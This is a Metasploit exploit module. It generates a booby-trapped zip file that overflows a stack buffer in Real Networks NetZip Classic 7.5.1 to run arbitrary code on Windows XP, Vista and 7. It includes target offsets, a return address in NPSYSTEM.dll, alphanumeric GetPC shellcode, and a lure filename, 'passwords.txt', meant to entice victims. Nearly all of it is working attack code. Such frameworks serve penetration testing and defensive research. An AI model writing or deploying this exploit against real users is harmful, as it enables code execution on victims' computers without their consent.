##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability',
        'Description' => %q{
          This module exploits a stack-based buffer overflow vulnerability in
          version 7.5.1 86 of Real Networks Netzip Classic.
          In order for the command to be executed, an attacker must convince someone to
          load a specially crafted zip file with NetZip Classic.
          By doing so, an attacker can execute arbitrary code as the victim user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'C4SS!0 G0M3S', # Vulnerability discovery and original exploit
          'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2011-10016' ],
          [ 'OSVDB', '83436' ],
          [ 'EDB', '16083' ],
          [ 'BID', '46059' ],
          [ 'URL', 'http://proforma.real.com' ]
        ],
        'Platform' => [ 'win' ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          'Space' => 1000,
          'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
          'DisableNops' => true,
          'EncoderOptions' =>
                        {
                          'BufferRegister' => 'ESI'
                        }
        },
        'Targets' => [
          [
            'Windows XP SP3',
            {
              'Offset' => 247, # To EIP
              'Ret' => 0x10061cf9, # PUSH ESP # RETN 08 - NPSYSTEM.dll 7.5.1.86
              'Max' => 2000,       # Max buffer size
            }
          ],

          [
            'Windows 7/Windows Vista',
            {
              'Offset' => 248, # To EIP
              'Ret' => 0x10061cf9, # PUSH ESP # RETN 08 - NPSYSTEM.dll 7.5.1.86
              'Max' => 2000,       # Max buffer size
            }
          ],
        ],
        'DisclosureDate' => '2011-01-30',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']),
        OptString.new('CONTENTNAME', [ true, 'Name of the fake zipped file', 'passwords.txt']),
      ]
    )
  end

  def exploit
    buffer = "#{datastore['CONTENTNAME']}"
    buffer << ' ' * (target['Offset'] - buffer.length)
    buffer << [target.ret].pack('V')
    buffer << make_nops(8)

    # GetPC - Non ascii characters get converted
    # alphanum getpc code from corelanc0d3r
    buffer << "\x89\x05"   # jmp short (5 bytes) to 'jmp back' at end
    buffer << "\x5e"       # pop esi
    buffer << "\x41"       # nop (inc ecx)
    buffer << "\x98\x99"   # call esi
    buffer << "\x41"       # nop (inc ecx)
    buffer << "\x8a\x94\x98\x98\x98" # jmp back to pop esi
    buffer << payload.encoded
    buffer << rand_text_alpha(target['Max'] - buffer.length)

    zip = Rex::Zip::Archive.new
    xtra = [0xdac0ffee].pack('V')
    comment = [0xbadc0ded].pack('V')
    zip.add_file(buffer, xtra, comment)

    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file...")

    file_create(zip.pack)
  end
end